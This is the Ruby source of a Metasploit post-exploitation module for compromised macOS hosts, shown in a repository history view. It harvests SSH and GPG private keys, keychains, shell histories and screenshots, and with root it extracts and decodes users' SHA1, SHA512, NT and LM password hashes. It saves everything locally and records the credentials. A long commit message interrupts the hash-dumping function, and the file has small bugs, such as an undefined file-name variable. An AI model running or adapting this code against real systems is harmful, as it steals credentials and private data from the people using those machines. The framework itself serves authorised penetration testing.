metasploit-framework/modules/post/osx/gather/enum_osx.rb

665 lines
19 KiB
Ruby
Raw Normal View History

##
# $Id$
##
##
# ## This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/post/file'
class Metasploit3 < Msf::Post
include Msf::Post::Common
include Msf::Post::File
include Msf::Auxiliary::Report
def initialize(info={})
super( update_info( info,
'Name' => 'OS X Gather Mac OS X System Information Enumeration',
'Description' => %q{
This module gathers basic system information from Mac OS X Tiger, Leopard,
Snow Leopard and Lion systems.
},
'License' => MSF_LICENSE,
'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>'],
'Version' => '$Revision$',
'Platform' => [ 'osx' ],
'SessionTypes' => [ "shell" ]
))
end
# Run Method for when run command is issued
def run
case session.type
when /meterpreter/
host = sysinfo["Computer"]
when /shell/
host = session.shell_command_token("hostname").chomp
end
print_status("Running module against #{host}")
running_root = check_root
if running_root
print_status("This session is running as root!")
end
ver_num = get_ver
log_folder = log_folder_create()
enum_conf(log_folder)
enum_accounts(log_folder, ver_num)
get_crypto_keys(log_folder)
screenshot(log_folder, ver_num)
dump_hash(log_folder,ver_num) if running_root
dump_bash_history(log_folder)
get_keychains(log_folder)
end
#parse the dslocal plist in lion
def read_ds_xml_plist(plist_content)
require "rexml/document"
doc = REXML::Document.new(plist_content)
keys = []
doc.elements.each("plist/dict/key") do |element|
keys << element.text
end
fields = {}
i = 0
doc.elements.each("plist/dict/array") do |element|
data = []
fields[keys[i]] = data
element.each_element("*") do |thing|
data_set = thing.text
if data_set
data << data_set.gsub("\n\t\t","")
else
data << data_set
end
end
i+=1
end
return fields
end
# Function for creating the folder for gathered data
def log_folder_create(log_path = nil)
#Get hostname
case session.type
when /meterpreter/
host = Rex::FileUtils.clean_path(sysinfo["Computer"])
when /shell/
host = Rex::FileUtils.clean_path(session.shell_command_token("hostname").chomp)
end
# Create Filename info to be appended to downloaded files
filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")
# Create a directory for the logs
if log_path
logs = ::File.join(log_path, 'logs', "enum_osx", host + filenameinfo )
else
logs = ::File.join(Msf::Config.log_directory, "post", "enum_osx", host + filenameinfo )
end
# Create the log directory
::FileUtils.mkdir_p(logs)
return logs
end
# Checks if running as root on the target
def check_root
# Get only the account ID
case session.type
when /shell/
id = session.shell_command_token("/usr/bin/id -ru").chomp
when /meterpreter/
id = cmd_exec("/usr/bin/id","-ru").chomp
end
if id == "0"
return true
else
return false
end
end
# Checks if the target is OSX Server
def check_server
# Get the OS Name
case session.type
when /meterpreter/
osx_ver = cmd_exec("/usr/bin/sw_vers", "-productName").chomp
when /shell/
osx_ver = session.shell_command_token("/usr/bin/sw_vers -productName").chomp
end
if osx_ver =~/Server/
return true
else
return false
end
end
# Enumerate the OS Version
def get_ver
# Get the OS Version
case session.type
when /meterpreter/
osx_ver_num = cmd_exec("/usr/bin/sw_vers", "-productVersion").chomp
when /shell/
osx_ver_num = session.shell_command_token("/usr/bin/sw_vers -productVersion").chomp
end
return osx_ver_num
end
def enum_conf(log_folder)
platform_type = session.platform
session_type = session.type
profile_datatypes = {"OS" => "SPSoftwareDataType",
"Network" => "SPNetworkDataType",
"Bluetooth" => "SPBluetoothDataType",
"Ethernet" => "SPEthernetDataType",
"Printers" => "SPPrintersDataType",
"USB" => "SPUSBDataType",
"Airport" => "SPAirPortDataType",
"Firewall" => "SPFirewallDataType",
"Known Networks" => "SPNetworkLocationDataType",
"Applications" => "SPApplicationsDataType",
"Development Tools" => "SPDeveloperToolsDataType",
"Frameworks" => "SPFrameworksDataType",
"Logs" => "SPLogsDataType",
"Preference Panes" => "SPPrefPaneDataType",
"StartUp" => "SPStartupItemDataType"}
shell_commands = {
"TCP Connections" => ["/usr/sbin/netstat","-np tcp"],
"UDP Connections" => ["/usr/sbin/netstat","-np udp"],
"Environment Variables" => ["/usr/bin/printenv",""],
"Last Boottime" => ["/usr/bin/who","-b"],
"Current Activity" => ["/usr/bin/who",""],
"Process List" => ["/bin/ps","-ea"]
}
print_status("Saving all data to #{log_folder}")
# Enumerate first using System Profiler
profile_datatypes.each do |name,profile_datatypes|
print_status("\tEnumerating #{name}")
# Run commands according to the session type
if session_type =~ /meterpreter/
returned_data = cmd_exec("system_profiler",profile_datatypes)
# Save data lo log folder
file_local_write(log_folder+"//#{name}.txt",returned_data)
elsif session_type =~ /shell/
begin
returned_data = session.shell_command_token("/usr/sbin/system_profiler #{profile_datatypes}",15)
# Save data lo log folder
file_local_write(log_folder+"//#{name}.txt",returned_data)
rescue
end
end
end
# Enumerate using system commands
shell_commands.each do |name, command|
print_status("\tEnumerating #{name}")
# Run commands according to the session type
begin
if session_type =~ /meterpreter/
command_output = cmd_exec(command[0],command[1])
# Save data lo log folder
file_local_write(log_folder+"//#{name}.txt",command_output)
elsif session_type =~ /shell/
command_output = session.shell_command_token(command.join(" "),15)
# Save data lo log folder
file_local_write(log_folder+"//#{name}.txt",command_output)
end
rescue
print_error("failed to run #{name}")
end
end
end
def enum_accounts(log_folder,ver_num)
# Specific commands for Leopard and Snow Leopard
leopard_commands = {
"Users" => ["/usr/bin/dscacheutil","-q user"],
"Groups" => ["/usr/bin/dscacheutil","-q group"]
}
# Specific commands for Tiger
tiger_commands = {
"Users" => ["/usr/sbin/lookupd","-q user"],
"Groups" => ["/usr/sbin/lookupd","-q group"]
}
if ver_num =~ /10\.(7|6|5)/
shell_commands = leopard_commands
else
shell_commands = tiger_commands
end
shell_commands.each do |name, command|
print_status("\tEnumerating #{name}")
# Run commands according to the session type
if session.type =~ /meterpreter/
command_output = cmd_exec(command[0],command[1])
# Save data lo log folder
file_local_write(log_folder+"//#{name}.txt",command_output)
elsif session.type =~ /shell/
command_output = session.shell_command_token(command.join(" "),15)
# Save data lo log folder
file_local_write(log_folder+"//#{name}.txt",command_output)
end
end
end
# Method for getting SSH and GPG Keys
def get_crypto_keys(log_folder)
# Run commands according to the session type
if session.type =~ /shell/
# Enumerate and retreave files according to privilege level
if not check_root
# Enumerate the home folder content
home_folder_list = session.shell_command_token("/bin/ls -ma ~/").chomp.split(", ")
# Check for SSH folder and extract keys if found
if home_folder_list.include?("\.ssh")
print_status(".ssh Folder is present")
ssh_folder = session.shell_command_token("/bin/ls -ma ~/.ssh").chomp.split(", ")
ssh_folder.each do |k|
next if k =~/^\.$|^\.\.$/
print_status("\tDownloading #{k.strip}")
ssh_file_content = session.shell_command_token("/bin/cat ~/.ssh/#{k}")
# Save data lo log folder
file_local_write(log_folder+"//#{name}",ssh_file_content)
end
end
# Check for GPG and extract keys if found
if home_folder_list.include?("\.gnupg")
print_status(".gnupg Folder is present")
gnugpg_folder = session.shell_command_token("/bin/ls -ma ~/.gnupg").chomp.split(", ")
gnugpg_folder.each do |k|
next if k =~/^\.$|^\.\.$/
print_status("\tDownloading #{k.strip}")
gpg_file_content = session.shell_command_token("/bin/cat ~/.gnupg/#{k.strip}")
# Save data lo log folder
file_local_write(log_folder+"//#{name}",gpg_file_content)
end
end
else
users = []
case session.type
when /meterpreter/
users_folder = cmd_exec("/bin/ls","/Users")
when /shell/
users_folder = session.shell_command_token("/bin/ls /Users")
end
users_folder.each_line do |u|
next if u.chomp =~ /Shared|\.localized/
users << u.chomp
end
users.each do |u|
user_folder = session.shell_command_token("/bin/ls -ma /Users/#{u}/").chomp.split(", ")
if user_folder.include?("\.ssh")
print_status(".ssh Folder is present for #{u}")
ssh_folder = session.shell_command_token("/bin/ls -ma /Users/#{u}/.ssh").chomp.split(", ")
ssh_folder.each do |k|
next if k =~/^\.$|^\.\.$/
print_status("\tDownloading #{k.strip}")
ssh_file_content = session.shell_command_token("/bin/cat /Users/#{u}/.ssh/#{k}")
# Save data lo log folder
file_local_write(log_folder+"//#{name}",ssh_file_content)
end
end
end
users.each do |u|
user_folder = session.shell_command_token("/bin/ls -ma /Users/#{u}/").chomp.split(", ")
if user_folder.include?("\.ssh")
print_status(".gnupg Folder is present for #{u}")
ssh_folder = session.shell_command_token("/bin/ls -ma /Users/#{u}/.gnupg").chomp.split(", ")
ssh_folder.each do |k|
next if k =~/^\.$|^\.\.$/
print_status("\tDownloading #{k.strip}")
ssh_file_content = session.shell_command_token("/bin/cat /Users/#{u}/.gnupg/#{k}")
# Save data lo log folder
file_local_write(log_folder+"//#{name}",ssh_file_content)
end
end
end
end
end
end
# Method for capturing screenshot of targets
def screenshot(log_folder, ver_num)
if ver_num =~ /10\.(7|6|5)/
print_status("Capturing screenshot")
picture_name = ::Time.now.strftime("%Y%m%d.%M%S")
if check_root
print_status("Capturing screenshot for each loginwindow process since privilege is root")
if session.type =~ /shell/
loginwindow_pids = session.shell_command_token("/bin/ps aux \| /usr/bin/awk \'/name/ \&\& \!/awk/ \{print \$2\}\'").split("\n")
loginwindow_pids.each do |pid|
print_status("\tCapturing for PID:#{pid}")
session.shell_command_token("/bin/launchctl bsexec #{pid} /usr/sbin/screencapture -x /tmp/#{pid}.jpg")
file_local_write(log_folder+"//screenshot_#{pid}.jpg",
session.shell_command_token("/bin/cat /tmp/#{pid}.jpg"))
session.shell_command_token("/usr/bin/srm -m -z /tmp/#{pid}.jpg")
end
end
else
# Run commands according to the session type
if session.type =~ /shell/
session.shell_command_token("/usr/sbin/screencapture -x /tmp/#{picture_name}.jpg")
file_local_write(log_folder+"//screenshot.jpg",
session.shell_command_token("/bin/cat /tmp/#{picture_name}.jpg"))
session.shell_command_token("/usr/bin/srm -m -z /tmp/#{picture_name}.jpg")
end
end
print_status("Screenshot Captured")
end
end
def dump_bash_history(log_folder)
print_status("Extracting history files")
# Run commands according to the session type
users = []
case session.type
when /meterpreter/
users_folder = cmd_exec("/bin/ls","/Users").chomp
current_user = cmd_exec("/usr/bin/id","-nu").chomp
when /shell/
users_folder = session.shell_command_token("/bin/ls /Users").chomp
current_user = session.shell_command_token("/usr/bin/id -nu").chomp
end
users_folder.each_line do |u|
next if u.chomp =~ /Shared|\.localized/
users << u.chomp
end
# If we are root lets get root for when sudo was used and all users
if current_user == "root"
# Check the root user folder
root_folder = session.shell_command_token("/bin/ls -ma ~/").chomp.split(", ")
root_folder.each do |f|
if f =~ /\.\w*\_history/
print_status("\tHistory file #{f.strip} found for root")
print_status("\tDownloading #{f.strip}")
sh_file = session.shell_command_token("/bin/cat ~/#{f.strip}")
# Save data lo log folder
file_local_write(log_folder+"//root_#{f.strip}.txt",sh_file)
end
end
# Getting the history files for all users
users.each do |u|
# Lets get a list of all the files on the users folder and place them in an array
user_folder = session.shell_command_token("/bin/ls -ma /Users/#{u}/").chomp.split(", ")
user_folder.each do |f|
if f =~ /\.\w*\_history/
print_status("\tHistory file #{f.strip} found for #{u}")
print_status("\tDownloading #{f.strip}")
sh_file = session.shell_command_token("/bin/cat /Users/#{u}/#{f.strip}")
# Save data lo log folder
file_local_write(log_folder+"//#{u}_#{f.strip}.txt",sh_file)
end
end
end
else
current_user_folder = session.shell_command_token("/bin/ls -ma ~/").chomp.split(", ")
current_user_folder.each do |f|
if f =~ /\.\w*\_history/
print_status("\tHistory file #{f.strip} found for #{current_user}")
print_status("\tDownloading #{f.strip}")
sh_file = session.shell_command_token("/bin/cat ~/#{f.strip}")
# Save data lo log folder
file_local_write(log_folder+"//#{current_user}_#{f.strip}.txt",sh_file)
end
end
end
end
# Dump SHA1 Hashes used by OSX, must be root to get the Hashes
def dump_hash(log_folder,ver_num)
print_status("Dumping Hashes")
users = []
nt_hash = nil
Merge session-host-rework branch back to master Squashed commit of the following: commit 2f4e8df33c5b4baa8d6fd67b400778a3f93482aa Author: James Lee <egypt@metasploit.com> Date: Tue Feb 28 16:31:03 2012 -0700 Clean up some rdoc comments This adds categories for the various interfaces that meterpreter and shell sessions implement so they are grouped logically in the docs. commit 9d31bc1b35845f7279148412f49bda56a39c9d9d Author: James Lee <egypt@metasploit.com> Date: Tue Feb 28 13:00:25 2012 -0700 Combine the docs into one output dir There's really no need to separate the API sections into their own directory. Combining them makes it much easier to read. commit eadd7fc136a9e7e4d9652d55dfb86e6f318332e0 Author: James Lee <egypt@metasploit.com> Date: Tue Feb 28 08:27:22 2012 -0700 Keep the order of iface attributes the same accross rubies 1.8 doesn't maintain insertion order for Hash keys like 1.9 does so we end up with ~random order for the display with the previous technique. Switch to an Array instead of a Hash so it's always the same. commit 6f66dd40f39959711f9bacbda99717253a375d21 Author: James Lee <egypt@metasploit.com> Date: Tue Feb 28 08:23:35 2012 -0700 Fix a few more compiler warnings commit f39cb536a80c5000a5b9ca1fec5902300ae4b440 Author: James Lee <egypt@metasploit.com> Date: Tue Feb 28 08:17:39 2012 -0700 Fix a type-safety warning commit 1e52785f38146515409da3724f858b9603d19454 Author: James Lee <egypt@metasploit.com> Date: Mon Feb 27 15:21:36 2012 -0700 LHOST should be OptAddress, not OptAddressRange commit acef978aa4233c7bd0b00ef63646eb4da5457f67 Author: James Lee <egypt@metasploit.com> Date: Sun Feb 26 17:45:59 2012 -0700 Fix a couple of warnings and a typo commit 29d87f88790aa1b3e5db6df650ecfb3fb93c675b Author: HD Moore <hdm@digitaloffense.net> Date: Mon Feb 27 11:54:29 2012 -0600 Fix ctype vs content_type typo commit 83b5400356c47dd1973e6be3aa343084dfd09c73 Author: Gregory Man <man.gregory@gmail.com> Date: Sun Feb 26 15:38:33 2012 +0200 Fixed scripts/meterpreter/enum_firefox to work with firefox > 3.6.x commit 49c2c80b347820d02348d694cc71f1b3028b4365 Author: Steve Tornio <swtornio@gmail.com> Date: Sun Feb 26 07:13:13 2012 -0600 add osvdb ref commit e18e1fe97b89c3a2b8c22bc6c18726853d2c2bee Author: Matt Andreko <mandreko@gmail.com> Date: Sat Feb 25 18:02:56 2012 -0500 Added aspx target to msfvenom. This in turn added it to msfencode as well. Ref: https://github.com/rapid7/metasploit-framework/pull/188 Tested on winxp with IIS in .net 1.1 and 2.0 modes commit e6aa5072112d79bbf8a4d2289cf8d301db3932f5 Author: Joshua J. Drake <github.jdrake@qoop.org> Date: Sat Feb 25 13:00:48 2012 -0600 Fixes #6308: Fall back to 127.0.0.1 when SocketError is raised from the resolver commit b3371e8bfeea4d84f9d0cba100352b57d7e9e78b Author: James Lee <egypt@metasploit.com> Date: Tue Feb 28 17:07:42 2012 -0700 Simplify logic for whether an inner iface has the same address commit 5417419f35a40d1c08ca11ca40744722692d3b0d Author: James Lee <egypt@metasploit.com> Date: Tue Feb 28 16:58:16 2012 -0700 Whitespace commit 9036875c2918439ae23e11ee7b958e30ccc29545 Author: James Lee <egypt@metasploit.com> Date: Tue Feb 28 16:53:45 2012 -0700 Set session info before worrying about address get_interfaces can take a while on Linux, grab uid and hostname earlier so we can give the user an idea of what they popped as soon as possible. commit f34b51c6291031ab25b5bfb1ac6307a516ab0ee9 Author: James Lee <egypt@metasploit.com> Date: Tue Feb 28 16:48:42 2012 -0700 Clean up rdoc commit e61a0663454400ec66f59a80d18b0baff4cb8cd9 Author: HD Moore <hd_moore@rapid7.com> Date: Tue Feb 28 04:54:45 2012 -0600 Ensure the architecture is only the first word (not the full WOW64 message in some cases) commit 4c701610976a92298c1182eecc9291a1b301e43b Author: HD Moore <hd_moore@rapid7.com> Date: Tue Feb 28 04:49:17 2012 -0600 More paranoia code, just in case RHOST is set to whitespace commit c5ff89fe3dc9061e0fa9f761e6530f6571989d28 Author: HD Moore <hd_moore@rapid7.com> Date: Tue Feb 28 04:47:01 2012 -0600 A few more small bug fixes to handle cases with an empty string target host resulting in a bad address commit 462d0188a1298f29ac83b10349aec6737efc5b19 Author: HD Moore <hd_moore@rapid7.com> Date: Tue Feb 28 03:55:10 2012 -0600 Fix up the logic (reversed by accident) commit 2b2b0adaec2448423dbd3ec54d90a5721965e2df Author: HD Moore <hd_moore@rapid7.com> Date: Mon Feb 27 23:29:52 2012 -0600 Automatically parse system information and populate the db, identify and report NAT when detected, show the real session_host in the sessions -l listing commit 547a4ab4c62dc3248f847dd5d305ad3b74157348 Author: HD Moore <hd_moore@rapid7.com> Date: Mon Feb 27 22:16:03 2012 -0600 Fix typo introduced commit 27a7b7961e61894bdecd55310a8f45d0917c5a5c Author: HD Moore <hd_moore@rapid7.com> Date: Mon Feb 27 22:11:38 2012 -0600 More session.session_host tweaks commit e447302a1a9915795e89b5e29c89ff2ab9b6209b Author: HD Moore <hd_moore@rapid7.com> Date: Mon Feb 27 22:08:20 2012 -0600 Additional tunnel_peer changes commit 93369fcffaf8c6b00d992526b4083acfce036bb3 Author: HD Moore <hd_moore@rapid7.com> Date: Mon Feb 27 22:06:21 2012 -0600 Additional changes to session.session_host commit c3552f66d158685909e2c8b51dfead7c240c4f40 Author: HD Moore <hd_moore@rapid7.com> Date: Mon Feb 27 22:00:19 2012 -0600 Merge changes into the new branch
2012-02-29 01:28:47 +00:00
host,port = session.session_host, session.session_port
# Path to files with hashes
nt_file = ::File.join(log_folder,"nt_hash.txt")
lm_file = ::File.join(log_folder,"lm_hash.txt")
sha1_file = ::File.join(log_folder,"sha1_hash.txt")
# Check if system is Lion if not continue
if ver_num =~ /10\.(7)/
hash_decoded = ""
# get list of profiles present in the box
profiles = cmd_exec("ls /private/var/db/dslocal/nodes/Default/users").split("\n")
if profiles
profiles.each do |p|
# Skip none user profiles
next if p =~ /^_/
next if p =~ /^daemon|root|nobody/
# Turn profile plist in to XML format
cmd_exec("cp /private/var/db/dslocal/nodes/Default/users/#{p.chomp} /tmp/")
cmd_exec("plutil -convert xml1 /tmp/#{p.chomp}")
file = cmd_exec("cat /tmp/#{p.chomp}")
# Clean up using secure delete overwriting and zeroing blocks
cmd_exec("/usr/bin/srm -m -z /tmp/#{p.chomp}")
# Process XML Plist into a usable hash
plist_values = read_ds_xml_plist(file)
# Extract the shadow hash data, decode it and format it
plist_values['ShadowHashData'].join("").unpack('m')[0].each_byte do |b|
hash_decoded << sprintf("%02X", b)
end
user = plist_values['name']
# Check if NT HASH is present
if hash_decoded =~ /4F1010/
nt_hash = hash_decoded.scan(/^\w*4F1010(\w*)4F1044/)
end
# Carve out the SHA512 Hash, the first 4 bytes is the salt
sha512 = hash_decoded.scan(/^\w*4F1044(\w*)(080B190|080D101E31)/)[0][0]
print_status("SHA512:#{user}:#{sha512}")
file_local_write(sha1_file,"#{user}:#{sha512}")
report_auth_info(
:host => host,
:port => 0,
:sname => 'sha512',
:user => user,
:pass => sha512,
:active => true
)
# Reset hash value
sha512 = ""
if nt_hash
print_status("NT:#{user}:#{nt_hash}")
file_local_write(nt_file,"#{user}:#{nt_hash}")
report_auth_info(
:host => host,
:port => 445,
:sname => 'smb',
:user => user,
:pass => nt_hash,
:active => true
)
# Reset hash value
nt_hash = nil
end
# Reset hash value
hash_decoded = ""
end
end
# If system was lion and it was processed nothing more to do
return
end
users_folder = cmd_exec("/bin/ls","/Users")
users_folder.each_line do |u|
next if u.chomp =~ /Shared|\.localized/
users << u.chomp
end
# Process each user
users.each do |user|
if ver_num =~ /10\.(6|5)/
guid = cmd_exec("/usr/bin/dscl", "localhost -read /Search/Users/#{user} | grep GeneratedUID | cut -c15-").chomp
elsif ver_num =~ /10\.(4|3)/
guid = cmd_exec("/usr/bin/niutil","-readprop . /users/#{user} generateduid").chomp
end
# Extract the hashes
sha1_hash = cmd_exec("/bin/cat", "/var/db/shadow/hash/#{guid} | cut -c169-216").chomp
nt_hash = cmd_exec("/bin/cat", "/var/db/shadow/hash/#{guid} | cut -c1-32").chomp
lm_hash = cmd_exec("/bin/cat", "/var/db/shadow/hash/#{guid} | cut -c33-64").chomp
# Check that we have the hashes and save them
if sha1_hash !~ /00000000000000000000000000000000/
print_status("SHA1:#{user}:#{sha1_hash}")
file_local_write(sha1_file,"#{user}:#{sha1_hash}")
report_auth_info(
:host => host,
:port => 0,
:sname => 'sha1',
:user => user,
:pass => sha1_hash,
:active => true
)
end
if nt_hash !~ /000000000000000/
print_status("NT:#{user}:#{nt_hash}")
file_local_write(nt_file,"#{user}:#{nt_hash}")
report_auth_info(
:host => host,
:port => 445,
:sname => 'smb',
:user => user,
:pass => nt_hash,
:active => true
)
end
if lm_hash !~ /0000000000000/
print_status("LM:#{user}:#{lm_hash}")
file_local_write(lm_file,"#{user}:#{lm_hash}")
report_auth_info(
:host => host,
:port => 445,
:sname => 'smb',
:user => user,
:pass => lm_hash,
:active => true
)
end
end
end
# Download configured Keychains
def get_keychains(log_folder)
users = []
case session.type
when /meterpreter/
users_folder = cmd_exec("/bin/ls","/Users").chomp
when /shell/
users_folder = session.shell_command_token("/bin/ls /Users").chomp
end
users_folder.each_line do |u|
next if u.chomp =~ /Shared|\.localized/
users << u.chomp
end
if check_root
users.each do |u|
print_status("Enumerating and Downloading keychains for #{u}")
keychain_files = session.shell_command_token("/usr/bin/sudo -u #{u} -i /usr/bin/security list-keychains").split("\n")
keychain_files.each do |k|
keychain_file = session.shell_command_token("/bin/cat #{k.strip}")
# Save data lo log folder
file_local_write(log_folder+"//#{u}#{k.strip.gsub(/\W/,"_")}",keychain_file)
end
end
else
current_user = session.shell_command_token("/usr/bin/id -nu").chomp
print_status("Enumerating and Downloading keychains for #{current_user}")
keychain_files = session.shell_command_token("usr/bin/security list-keychains").split("\n")
keychain_files.each do |k|
keychain_file = session.shell_command_token("/bin/cat #{k.strip}")
# Save data lo log folder
file_local_write(log_folder+"//#{current_user}#{k.strip.gsub(/\W/,"_")}",keychain_file)
end
end
end
end